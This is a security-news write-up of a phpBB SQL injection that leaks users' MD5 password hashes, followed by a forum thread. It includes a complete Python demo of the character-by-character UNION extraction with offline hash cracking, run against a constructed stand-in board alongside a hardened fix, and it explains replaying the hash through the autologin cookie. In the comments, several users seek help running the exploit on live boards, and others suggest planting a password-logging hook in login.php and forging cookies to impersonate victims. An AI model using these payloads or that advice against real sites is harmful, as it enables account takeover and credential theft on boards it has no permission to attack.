This exploit is getting a mixed reaction. Rootsecure.net finds the code "ingenious", while some sources claim the exploit has too many prerequisites. You decide.
A recent post to the BugTraq mailing list revealed yet another vulnerability in phpBB, "a high powered, fully scalable, and highly customisable open-source bulletin board package".
The post contains ingenious proof-of-concept code that works around phpBB's built-in security measures, specifically the fact that through this vulnerability only integers can be passed back to the client. The code turns that limitation into a narrow channel: the MD5 password hash of a chosen user is returned to the attacker one character at a time, each character encoded as an integer the page will echo.
The attack was found to be successful against a test machine running "mysql Ver 12.20 Distrib 4.0.13", but only when PHP was configured with register_globals set to on. This is still a common configuration on web servers, and will hopefully be eradicated as PHP 4.2 and later (which default to register_globals = off) are more widely deployed.
For the test scenario a user was registered on the phpBB board with username 'test' and password 'test123'. The MD5 hash of 'test123' (cc03e747a6afbbcbf8be7668acfebee5) was obtained by executing the following Perl code:
use Digest::MD5 qw(md5_hex);
$digest = md5_hex("test123");
print "$digest\n";
Running the exploit against the test board for user id 3 produced the response:
Trying to get password hash for uid 3 server localhost dbtype: mysql4
MD5 Hash for uid 3 is cc03e747a6afbbcbf8be7668acfebee5
Note: the MD5 hash obtained by the exploit can be seen to match the known hash for the password 'test123'.
Once the attacker has the MD5 password hash it can be used in two main ways. It can be cracked offline by brute force (a 7 character password would take a couple of hours on a machine of reasonable specification), or it can be inserted directly into a hand-crafted HTTP request, since phpBB 2.0 boards of that era accepted the stored hash itself (via the autologin cookie) in place of a password, so no cracking is needed. Either route leads to compromise of the phpBB user account.
Actual log entries from a successful attack, along with the raw HTTP traffic sent by the client, are available for download from: content/temp/phpbb_sql_int_inqection.txt
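The extraction technique described above, as an added example that is neither phpBB's code nor the phpbb_sql.pl exploit from the BugTraq post: a constructed SQLite stand-in for a page that interpolates an untrusted topic id into a query and echoes only an integer, the one-character-per-request loop that turns that integer echo into a user's MD5 hash, a dictionary check of the leaked hash (the brute-force route), and a hardened version of the same page. The table names, the page markup, the candidate word list and the SQLite functions used in the payload (unicode()/substr() standing in for MySQL's ord()/substring()) are assumptions made for this example; the only real data is the test user from the write-up (uid 3, password 'test123').

```python
import hashlib
import re
import sqlite3

# Constructed stand-in for the vulnerable board (not phpBB's schema or code).
KNOWN_HASH = hashlib.md5(b"test123").hexdigest()  # cc03e747a6afbbcbf8be7668acfebee5


def build_board() -> sqlite3.Connection:
    """In-memory board with one topic table and the user from the write-up."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE phpbb_users (user_id INTEGER, username TEXT, user_password TEXT);
        CREATE TABLE phpbb_topics (topic_id INTEGER, forum_id INTEGER);
        INSERT INTO phpbb_topics VALUES (1, 2), (7, 5);
        """
    )
    db.execute("INSERT INTO phpbb_users VALUES (1, 'admin', ?)",
               (hashlib.md5(b"some-other-password").hexdigest(),))
    db.execute("INSERT INTO phpbb_users VALUES (3, 'test', ?)", (KNOWN_HASH,))
    return db


def vulnerable_page(db: sqlite3.Connection, topic_id: str) -> str:
    """Integer-only oracle: the untrusted parameter is pasted into the SQL,
    and the only attacker-influenced value that reaches the page is the
    integer forum_id, which is echoed inside a link."""
    row = db.execute(
        f"SELECT forum_id FROM phpbb_topics WHERE topic_id = {topic_id}"
    ).fetchone()
    if row is None:
        return "<p>The topic you requested does not exist</p>"
    return f'<a href="viewforum.php?f={int(row[0])}">Back to forum</a>'


def hardened_page(db: sqlite3.Connection, topic_id: str) -> str:
    """Same page with the usual fix: cast the id to int before it touches
    SQL (ValueError on anything else) and bind it instead of interpolating."""
    tid = int(topic_id)
    row = db.execute(
        "SELECT forum_id FROM phpbb_topics WHERE topic_id = ?", (tid,)
    ).fetchone()
    if row is None:
        return "<p>The topic you requested does not exist</p>"
    return f'<a href="viewforum.php?f={row[0]}">Back to forum</a>'


def leak_hash(page, uid: int, length: int = 32) -> str:
    """Recover user_password for `uid` one character per request. The UNION
    makes the echoed integer the code point of the character at `pos`;
    unicode()/substr() are SQLite's equivalents of MySQL's ord()/substring()."""
    recovered = ""
    for pos in range(1, length + 1):
        payload = (
            f"-1 UNION SELECT unicode(substr(user_password,{pos},1)) "
            f"FROM phpbb_users WHERE user_id={uid}"
        )
        m = re.search(r"viewforum\.php\?f=(\d+)", page(payload))
        if m is None:
            break  # no echo: the hole is closed or the uid does not exist
        recovered += chr(int(m.group(1)))
    return recovered


def crack_md5(digest: str, candidates):
    """Offline check of a leaked hash against a (constructed) candidate list."""
    for pw in candidates:
        if hashlib.md5(pw.encode()).hexdigest() == digest:
            return pw
    return None


def demo() -> dict:
    db = build_board()
    leaked = leak_hash(lambda p: vulnerable_page(db, p), uid=3)
    try:
        hardened_page(db, "-1 UNION SELECT unicode(substr(user_password,1,1)) "
                          "FROM phpbb_users WHERE user_id=3")
        blocked = False
    except ValueError:
        blocked = True
    return {
        "leaked": leaked,
        "cracked": crack_md5(leaked, ["password", "test", "test123", "letmein"]),
        "injection_blocked": blocked,
        "legit_request_ok": "f=5" in hardened_page(db, "7"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The loop needs 32 requests for a 32-character hex digest, which is also why a board that returns nothing after "MD5 Hash for uid N is" (as several replies below report) usually means the integer echo was never observed: a fixed board, a wrong uid, or a page layout the exploit's pattern match does not recognise.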
KarachiKing555
Oct 27 2003, 10:11 PM
Hi, how are you guys using .sql.pl as an exploit? Little hints please, I am new to all this so don't flame me off! Thanks
dorsi
Oct 11 2003, 10:04 PM
Please, someone answer me... it's very important
dorsi
Oct 11 2003, 06:37 PM
Hi, I did like the exploit said and it shows me only: MD5 Hash for uid 3 is, without the MD5 password hash... if you know what the problem is here, please help me
Greetz, dor
Cetras
Oct 16 2003, 10:03 PM
And how can I crack the hash of 32 characters? I tried with MDCrack but it says it can't crack it.
And how do I make the .txt file? With only the hash, or "user:hash"???
Thanks (sorry for my bad English ^^)
PS: I think if you get nothing, it's because the exploit didn't work on this version (phpBB 2.0.6 or MySQL)
Cetras
Oct 17 2003, 08:43 PM
Okay, I hacked them with Cain, and the exploit works with 2.0.6 too
agathos
Oct 17 2003, 09:14 PM
I got the same error: Trying to get password hash for uid 1 server xxxxxxx dbtype: mysql4
MD5 Hash for uid 1 is
and then it exits
Cetras
Oct 18 2003, 01:47 PM
Does somebody know how to find the IP of a board? Because some are hosted and you can't use the exploit if you don't know the IP address.
Kynroxes
Oct 21 2003, 05:00 AM
lol Cetras, phpBB sploit rulezz!! But if you won't use MDCrack, you can put code in login.php in order to write the login/password to a .txt file... But this technique needs rights on login.php, so!
Thanks for that Perl code for converting a normal string to an MD5 hash! But who knows the code to reconvert it?!
Faceless Master
Feb 8 2004, 03:16 PM
Didn't work for me... ~Regards, Faceless Master
P.S. Karachi King, use ActivePerl
DvilleStoner
Feb 26 2004, 10:34 AM
QUOTE (KarachiKing555 @ Oct 27 2003, 10:11 PM)
Hi, how are you guys using .sql.pl as an exploit? Little hints please, I am new to all this so don't flame me off! Thanks
Same question
z0mbi3
Feb 26 2004, 11:26 AM
To run it, install ActiveState Perl, then through the command prompt type perl hello.pl. Should run...
I don't think you can convert MD5 back to a normal string.. You'll need to convert the normal string into MD5 and see if it matches, more along the lines of brute forcing
migo
Feb 26 2004, 11:52 AM
Hello, trying to use it but it gives me the same result, which is an empty MD5 hash.
As you know, mostly I can't put in the IP addresses because most IPs are shared and most sites are virtually hosted. Any clue on how to modify the code? I tried to put the query directly in the browser but it didn't work.
Any clue is much appreciated.
Best regards, migo
canardwc
Mar 6 2004, 06:53 PM
Hmm, seems to work, thanks :-)
setthesun
Mar 6 2004, 10:42 PM
Also, if phpBB uses cookies (and we know it does), you don't have to crack MD5 passwords, just modify the cookies and steal your victim's identity
Hint: use a proxy to modify HTTP headers (something like SPIKE Proxy)
p3nGu1n
Jun 10 2004, 04:01 AM
perl phpbb_sql.pl xx.xx.xx.xx http://domain.co.uk/forum/viewtopic.php 3
Trying to get password hash for uid 3 server xx.xx.xx.xx dbtype: mysql4
Couldnt connect to xx.xx.xx.xx:80 : IO::Socket::INET: Bad protocol 'tcp'
using ActivePerl.
jadedchron
Jul 11 2004, 12:13 AM
Did anyone ever resolve a way to do this even if it's not a hergerburger or whatever the thing was (lol)?
Or is it COMPLETELY impossible to do if the forum is something to the effect of
www.blah.com/phpbb2/
but it's really www.somehost.com/blah/phpbb2 or something of that nature?
chris105
Jul 11 2004, 12:16 PM
Shouldn't have thought so; the status bar at the bottom will show the URL where you have been redirected, right?
It takes me to their host's page or something similar.
linuxwolf
Jul 11 2004, 09:59 PM
Aight, I'll be the first one to answer the original question. Let me put it simply: I N G E N I O U S C O D E. Heh, think that gets the point across. Anyway, you lot need to read up some shit. I understand asking for help, but all the time is unacceptable. Learn to help yourselves.